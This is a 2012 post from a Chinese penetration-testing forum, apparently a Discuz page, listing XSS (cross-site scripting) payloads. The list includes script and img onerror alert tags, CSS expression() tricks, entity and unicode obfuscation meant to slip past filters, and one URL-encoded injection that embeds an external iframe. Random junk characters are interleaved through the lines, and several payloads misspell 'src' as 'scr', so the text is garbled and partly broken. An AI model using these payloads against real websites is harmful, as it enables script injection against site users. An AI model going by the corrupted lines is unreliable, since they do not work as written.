中国网络渗透测试联盟

标题: 跨站语句大全 [打印本页]
作者: admin    时间: 2012-9-13 17:15
标题: 跨站语句大全
<script>alert("跨站")</script>    (最常用)2 e3 @: H* w4 v7 D3 q' x( g" h
<img scr=javascript:alert("跨站")></img>
) C8 T$ m. f  e+ f9 x  }4 \1 e0 L<img scr="javascrip&#116&#58 alert(/跨站/)></img>
: u; q% e9 l5 e5 G5 v<img scr="javas????cript:alert(/跨站/)" width=150></img> (?用tab键弄出来的空格)' o4 L5 T. m- ?
<img scr="#" onerror=alert(/跨站/)></img>) f) A4 ]; |4 P: ]  ~
<img scr="#" style="xss:expression(alert(/xss/));"></img>
1 B! ]7 a# m. p% O<img scr="#"/* */onerror=alert(/xss/) width=150></img> (/**/ 表示注释)
1 s2 m1 ?/ \2 j6 ]0 ^0 p<img src=vbscript:msgbox ("xss")></img>
6 @, f2 B1 D/ m( j" j8 r& n8 P<style> input {left:expression (alert('xss'))}</style>+ l! O8 M; e: D, w0 a* @
<div style={left:expression (alert('xss'))}></div>4 f4 F: w# G* z' [
<div style={left:exp/* */ression (alert('xss'))}></div>
& t0 N. B5 M5 Z: _! C<div style={left:\0065\0078ression (alert('xss'))}></div>8 s. Z* }! A. Z
html 实体 <div style={left:&#x0065;xpression (alert('xss'))}></div>0 b- Q( O9 w  H3 B1 o7 R
unicode <div style="{left:expRessioN (alert('xss'))}">+ R; I* y; B4 T8 `
) K& I( Z$ j) z, _
"]}%3Cscript%3Ealert('By b14ckb0y')%3C/script%3E{[&item="]<iframe%20src=http://new.qzone.qq.com/9530772%20width=400%20height=600></iframe>["
$ b1 D( T/ f5 b3 _% i



欢迎光临 中国网络渗透测试联盟 (https://cobjon.com/) Powered by Discuz! X3.2